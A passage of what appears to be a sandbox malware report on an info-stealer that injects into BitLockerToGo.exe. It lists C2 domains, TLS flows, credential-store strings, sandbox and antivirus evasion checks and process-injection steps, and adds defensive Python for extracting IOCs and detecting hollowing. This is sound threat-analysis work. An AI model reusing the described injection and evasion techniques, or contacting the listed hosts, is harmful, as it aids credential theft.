Source: BitLockerToGo.exe, 00000002.00000003.1976536875.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://treehoneyi.click/)
Source: BitLockerToGo.exe, 00000002.00000003.2069182897.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052527856.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://treehoneyi.click/B
Source: BitLockerToGo.exe, 00000002.00000003.2098950995.0000000002B05000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052527856.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://treehoneyi.click/Y
Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000002.00000003.2052483380.0000000004DFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098981402.0000000004DF9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099926152.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098966843.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099941330.0000000004DFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099597168.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2069182897.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028290120.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999447521.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999741792.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2069239176.0000000004DFB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2029666880.0000000004DF9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2000294448.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://treehoneyi.click/api
                Source: BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/api0
                Source: BitLockerToGo.exe, 00000002.00000003.2069182897.0000000002AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/apiOH
                Source: BitLockerToGo.exe, 00000002.00000002.2099926152.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098966843.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028290120.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999447521.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1999741792.0000000004DF2000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2000294448.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2005117624.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/h
                Source: BitLockerToGo.exe, 00000002.00000003.2098950995.0000000002B05000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099641821.0000000002B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/s
                Source: BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click:443/api
                Source: BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click:443/apin.txtPK
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: BitLockerToGo.exe, 00000002.00000003.1951766814.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1951683467.0000000004E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: BitLockerToGo.exe, 00000002.00000003.2004720040.0000000004F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: MPySEh8HaF.exe, 00000000.00000000.1674737489.0000000001715000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameEasyBackup.exe8 vs MPySEh8HaF.exe
                Source: MPySEh8HaF.exeBinary or memory string: OriginalFileNameEasyBackup.exe8 vs MPySEh8HaF.exe
                Source: MPySEh8HaF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
                Source: MPySEh8HaF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: BitLockerToGo.exe, 00000002.00000003.1952260514.0000000004DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MPySEh8HaF.exeReversingLabs: Detection: 55%
                Source: MPySEh8HaF.exeVirustotal: Detection: 58%
                Source: MPySEh8HaF.exeString found in binary or memory: @v1.5.6/loadconfig.go
                Source: MPySEh8HaF.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
                Source: unknownProcess created: C:\Users\user\Desktop\MPySEh8HaF.exe "C:\Users\user\Desktop\MPySEh8HaF.exe"
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: MPySEh8HaF.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: MPySEh8HaF.exeStatic file information: File size 7409664 > 1048576
                Source: MPySEh8HaF.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x328800
                Source: MPySEh8HaF.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x301a00
                Source: MPySEh8HaF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: MPySEh8HaF.exeStatic PE information: section name: .symtab
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_3_02AF2469 push esi; retf 2_3_02AF246C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_3_02AF2469 push esi; retf 2_3_02AF246C
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MPySEh8HaF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
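The memory strings above show the same C2 host with trailing heap bytes glued on (/api0, /apin.txtPK, /Y, /)) next to browser-profile URLs (ecosia, google, mozilla, support.office.com) that the stealer read out of the victim's own browser data, plus eight TLS sessions to one server IP. The Python below is an added example, not part of the Joe Sandbox report: it parses such lines into per-host IOCs, ranks the observed paths so the real endpoint surfaces ahead of its truncated siblings, and tallies TLS endpoints. The input is excerpted from this report with the .sdmp memory-dump references shortened; the allowlist of browser-profile hosts is an analyst assumption, not something the sandbox labels.

```python
"""Added example: normalise sandbox memory-string and TLS-flow lines into
network IOCs. Not part of the Joe Sandbox report; the lines below are excerpted
from it with the .sdmp memory-dump references shortened."""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed input, excerpted from the report above (dump references shortened).
SAMPLE_LINES = """\
Source: BitLockerToGo.exe, 00000002.00000003.1976536875.sdmp String found in binary or memory: https://treehoneyi.click/)
Source: BitLockerToGo.exe, 00000002.00000003.2069182897.sdmp String found in binary or memory: https://treehoneyi.click/B
Source: BitLockerToGo.exe, 00000002.00000002.2099469682.sdmp String found in binary or memory: https://treehoneyi.click/api
Source: BitLockerToGo.exe, 00000002.00000002.2099469682.sdmp String found in binary or memory: https://treehoneyi.click/api0
Source: BitLockerToGo.exe, 00000002.00000002.2099469682.sdmp String found in binary or memory: https://treehoneyi.click:443/api
Source: BitLockerToGo.exe, 00000002.00000002.2099469682.sdmp String found in binary or memory: https://treehoneyi.click:443/apin.txtPK
Source: BitLockerToGo.exe, 00000002.00000003.1951766814.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000002.00000003.2004720040.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.sdmp String found in binary or memory: rapeflowwj.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.sdmp String found in binary or memory: treehoneyi.click
Source: unknown HTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.180.113:443 -> 192.168.2.4:49737 version: TLS 1.2
"""

STRING_RE = re.compile(r"String found in binary or memory:\s*(\S+)\s*$")
FLOW_RE = re.compile(
    r"HTTPS traffic detected:\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s*->\s*"
    r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")
BARE_DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$", re.I)

# Analyst-supplied allowlist (assumption): hosts that originate from the
# victim's browser profile, not from the malware's configuration.
BROWSER_PROFILE_HOSTS = {"www.ecosia.org", "www.google.com",
                         "www.mozilla.org", "support.office.com"}


def parse_report(text):
    """Return ({host: {"paths": Counter, "ports": set, "sightings": int}},
               Counter of (server_ip, server_port) TLS flows)."""
    hosts = defaultdict(lambda: {"paths": Counter(), "ports": set(), "sightings": 0})
    flows = Counter()
    for line in text.splitlines():
        m = STRING_RE.search(line)
        if m:
            value = m.group(1)
            if "://" in value:
                parts = urlsplit(value)
                if not parts.hostname:
                    continue
                rec = hosts[parts.hostname.lower()]
                rec["sightings"] += 1
                rec["ports"].add(parts.port or (443 if parts.scheme == "https" else 80))
                # Memory strings are rarely NUL-terminated cleanly: "/api0" and
                # "/apin.txtPK" are "/api" followed by adjacent heap bytes, so
                # keep the raw path and let the counts and ranking sort it out.
                rec["paths"][parts.path or "/"] += 1
            elif BARE_DOMAIN_RE.match(value):
                hosts[value.lower()]["sightings"] += 1
            continue
        m = FLOW_RE.search(line)
        if m:
            flows[(m.group(1), int(m.group(2)))] += 1
    return dict(hosts), flows


def likely_c2_paths(rec):
    """Observed paths, the one that is a prefix of the most others first
    ("/api" outranks "/api0" and "/apin.txtPK"); a bare "/" never wins."""
    paths = list(rec["paths"])

    def support(p):
        return sum(1 for q in paths if q.startswith(p) and p != "/")

    return sorted(paths, key=lambda p: (-support(p), len(p)))


def suspect_hosts(hosts):
    """Hosts left after removing known browser-profile origins."""
    return sorted(h for h in hosts if h not in BROWSER_PROFILE_HOSTS)


if __name__ == "__main__":
    hosts, flows = parse_report(SAMPLE_LINES)
    for h in suspect_hosts(hosts):
        rec = hosts[h]
        print(f"{h}: {rec['sightings']} sightings, ports {sorted(rec['ports'])}, "
              f"best path {likely_c2_paths(rec)[:1]}")
    for (ip, port), n in flows.items():
        print(f"{ip}:{port}: {n} TLS sessions")
```

The script does not tie 172.67.180.113 to treehoneyi.click; the report lists the TLS flows and the memory strings separately, and the link needs the DNS answer or the SNI from the pcap.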

Malware Analysis System Evasion

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe System information queried: FirmwareTableInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7720 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7720 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: BitLockerToGo.exe, 00000002.00000002.2099469682.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpL
Source: MPySEh8HaF.exe, 00000000.00000002.1898714399.0000000000B57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000002.00000003.2098750489.0000000002A8F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2099536682.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052496714.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2098922886.0000000002A96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\MPySEh8HaF.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 530000 protect: page execute and read and write
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 530000 value starts with: 4D5A
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Source: MPySEh8HaF.exe, 00000000.00000002.1901746510.000000000A304000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: treehoneyi.click
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 613008
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 530000
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 531000
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 570000
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 573000
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 582000
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\MPySEh8HaF.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: BitLockerToGo.exe, 00000002.00000003.2052527856.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052439419.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2052496714.0000000002A96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
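The entries above are the injection chain in order: MPySEh8HaF.exe creates a child BitLockerToGo.exe, allocates an execute/read/write region in it at base 530000, writes a buffer that starts with 4D5A (the PE "MZ" magic) to that base, writes further regions (531000 through 582000 and 613008), and the signed Windows binary then runs the stealer code that performs the TLS sessions and wallet reads recorded elsewhere in this report. The Python below is an added example, not part of the Joe Sandbox report, of a detection that correlates such events per (writer, target) process pair and only fires when the MZ write lands in an executable region the same writer allocated, so a parent that patches a few bytes of a child is not flagged. The event schema, field names, the suspended-create flag and every PID except the report's BitLockerToGo.exe PID 7676 are constructed stand-ins for EDR telemetry.

```python
"""Added example: flag the allocate-executable / write-MZ / run pattern per
(writer, target) process pair. Not part of the Joe Sandbox report; the events
below are constructed EDR-style telemetry, and every PID except the report's
BitLockerToGo.exe PID 7676 is made up."""
import json
from collections import defaultdict

CREATE_SUSPENDED = 0x4   # CreateProcess dwCreationFlags bit; optional evidence here
EXEC_PROTECTIONS = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ",
                    "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}
MZ_MAGIC = "4d5a"        # first two bytes of every PE image

# Constructed JSON-lines telemetry: the report's chain (7400 -> 7676) followed by
# a benign parent/child pair (8000 -> 8100) that must not be flagged.
SAMPLE_EVENTS = r"""
{"ts": 1, "type": "process_create", "pid": 7676, "ppid": 7400, "image": "C:\\Windows\\BitLockerDiscoveryVolumeContents\\BitLockerToGo.exe", "parent_image": "C:\\Users\\user\\Desktop\\MPySEh8HaF.exe", "flags": 4}
{"ts": 2, "type": "remote_alloc", "pid": 7400, "target_pid": 7676, "base": "0x530000", "protect": "PAGE_EXECUTE_READWRITE"}
{"ts": 3, "type": "remote_write", "pid": 7400, "target_pid": 7676, "base": "0x530000", "first_bytes": "4d5a90000300"}
{"ts": 4, "type": "remote_write", "pid": 7400, "target_pid": 7676, "base": "0x613008", "first_bytes": "005300000000"}
{"ts": 5, "type": "thread_resume", "pid": 7400, "target_pid": 7676}
{"ts": 6, "type": "process_create", "pid": 8100, "ppid": 8000, "image": "C:\\Program Files\\Vendor\\helper.exe", "parent_image": "C:\\Program Files\\Vendor\\setup.exe", "flags": 4}
{"ts": 7, "type": "remote_write", "pid": 8000, "target_pid": 8100, "base": "0x7ff000", "first_bytes": "500041544800"}
{"ts": 8, "type": "thread_resume", "pid": 8000, "target_pid": 8100}
"""


def load_events(text):
    """Parse JSON-lines telemetry and order it by timestamp."""
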